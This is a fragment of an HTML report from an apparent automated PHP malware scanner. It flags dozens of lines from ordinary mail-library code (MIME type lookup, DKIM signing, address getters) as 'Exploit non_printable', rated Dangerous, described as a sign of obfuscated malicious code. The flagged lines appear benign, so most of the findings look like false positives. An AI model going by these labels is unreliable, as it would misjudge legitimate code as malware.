</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3708</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3808</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3911</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3931</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
